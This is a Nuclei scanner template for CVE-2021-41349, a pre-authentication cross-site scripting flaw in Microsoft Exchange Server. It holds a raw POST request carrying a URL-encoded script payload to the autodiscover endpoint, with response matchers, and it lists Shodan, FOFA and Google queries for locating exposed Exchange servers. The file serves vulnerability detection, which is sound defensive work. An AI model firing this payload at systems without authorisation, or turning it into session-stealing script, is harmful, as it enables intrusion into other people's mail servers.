nuclei-templates/http/cves/2021/CVE-2021-41349.yaml

70 lines
2.5 KiB
YAML
Raw Permalink Normal View History

2021-11-12 18:59:04 +00:00
id: CVE-2021-41349
2021-11-12 18:25:15 +00:00
info:
name: Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting
2021-11-12 18:59:04 +00:00
author: rootxharsh,iamnoooob
2021-11-12 18:25:15 +00:00
severity: medium
description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest security updates provided by Microsoft to mitigate this vulnerability.
2021-11-12 18:59:04 +00:00
reference:
- https://www.microsoft.com/en-us/download/details.aspx?id=103643
2021-11-12 18:59:04 +00:00
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
- https://nvd.nist.gov/vuln/detail/CVE-2021-41349
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349
2023-07-11 19:49:27 +00:00
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41349
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-41349
epss-score: 0.96172
epss-percentile: 0.99474
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: microsoft
product: exchange_server
shodan-query:
- vuln:cve-2021-26855
- http.favicon.hash:1768726119
- http.title:"outlook"
- cpe:"cpe:2.3:a:microsoft:exchange_server"
fofa-query:
- title="outlook"
- icon_hash=1768726119
2024-05-31 19:23:20 +00:00
google-query: intitle:"outlook"
2023-07-11 19:49:27 +00:00
tags: cve,cve2021,xss,microsoft,exchange
2021-11-12 18:59:04 +00:00
http:
2021-11-12 18:25:15 +00:00
- raw:
- |
POST /autodiscover/autodiscover.json HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2021-11-12 19:07:40 +00:00
%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1
2021-11-12 18:25:15 +00:00
2021-11-12 18:59:04 +00:00
matchers-condition: and
2021-11-12 18:25:15 +00:00
matchers:
2021-11-12 18:59:04 +00:00
- type: word
words:
2021-11-12 19:07:40 +00:00
- 'alert(document.domain);'
- 'a=""'
condition: and
2021-11-12 18:59:04 +00:00
- type: word
part: header
words:
- 'text/html'
2022-05-26 03:05:36 +00:00
- type: word
2023-07-11 19:49:27 +00:00
negative: true
2022-05-26 03:05:36 +00:00
words:
- "A potentially dangerous Request.Form value was detected from the client"
2021-11-12 18:59:04 +00:00
- type: status
status:
- 500
# digest: 4a0a0047304502210082ffeba5244b2355aebb82708913ac003ec222501eb6c2178ff0907e6b08c269022028637f8d68527b70f61dec192fe664515fe8c4ee71f67d562e0dedb37e373144:922c64590222798bb761d5b6d8e72950